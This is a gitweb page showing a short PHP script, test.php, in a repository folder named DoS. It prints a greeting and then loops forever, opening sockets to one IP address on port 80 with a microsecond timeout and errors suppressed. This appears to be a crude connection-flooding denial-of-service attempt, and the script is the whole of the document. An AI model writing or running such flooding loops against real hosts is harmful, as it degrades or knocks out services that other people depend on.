d5541f430794c41ca4b41ccb5639c61d205199a0
[mirrors/Programs.git] / php / DoS / test.php
1 #!/usr/bin/php
2 <?php
3
4 echo("Hello World...\n");
5 while(1) {
6 @fsockopen("0.0.105.76", 80, $err, $errstr, 0.00001);
7 }
8
9 ?>
This page took 1.179251 seconds and 5 git commands to generate.